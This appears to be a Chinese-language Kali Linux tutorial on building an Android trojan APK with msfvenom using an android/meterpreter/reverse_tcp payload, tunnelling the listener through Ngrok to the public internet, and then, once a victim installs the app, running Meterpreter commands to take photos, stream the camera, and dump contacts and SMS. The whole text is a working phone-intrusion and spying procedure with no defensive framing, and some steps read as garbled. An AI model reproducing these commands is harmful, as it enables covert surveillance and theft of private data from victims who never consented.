简介
Kali常用配置和基本使用
1.根据攻击机系统情况下载客户端版本这里下载Linux 64bita版本
2. 拖入虚拟器托不进去看上一个教程 解压zip
3.进入解压好的目录报错Tcp就重新去Ngrok重新换一个隧道免费很多人用
./sunny clientid id =>隧道id
启动了当前窗口不要关闭
不加Tcp| 端口不然报错 msfvenom -p android/meterpreter/reverse_tcp LHOST=外网穿透的ip地址 LPORT=外网穿透端口 R >/home/test.apk
成功就有meterpreter命令行 执行命令即可
sysinfo //查看手机信息
app_list //查看手机app信息
webcam_snap //拍照
保存到此目录
成功拍照。
我的手机拍照过程有声音
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
入侵手机并监控其摄像头的方法如下:
确保Kali和手机在同一网络段,并连接到同一Wi-Fi网络。在Kali的网络适配器中选择桥接模式,并输入`dhclient`命令重新分配IP地址,以确保与手机处于同一网段。
在Kali终端输入`msfconsole`命令启动Metasploit框架。
使用`msfvenom`生成一个预设向连接Kali主机的Android木马应用。输入命令`msfvenom -p android/meterpreter/reverse_tcp LHOST=你的Kali的IP LPORT=5555`,然后选择一个payload,例如`android/meterpreter/reverse_tcp`,并设置本地监听主机的IP和端口。
运行`exploit`命令开始监听,等待手机上线。
手机上线后,将其中的`apk`文件安装到手机上。
在手机上安装木马应用后,可以使用Metasploit的命令行对手机进行操作,例如查看手机信息(`sysinfo`)、开启摄像头(`webcam_stream`)、拍照(`webcam_snap`)、导出联系人信息(`dump_contacts`)、短信记录(`dump_sms`)等。